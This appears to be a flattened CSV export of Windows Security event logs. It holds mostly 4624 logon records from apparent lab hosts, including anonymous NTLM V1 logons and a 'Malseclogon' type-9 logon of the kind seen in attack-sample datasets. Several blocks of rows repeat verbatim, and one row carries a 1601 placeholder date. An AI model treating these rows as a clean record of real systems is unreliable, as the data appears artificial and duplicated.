0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 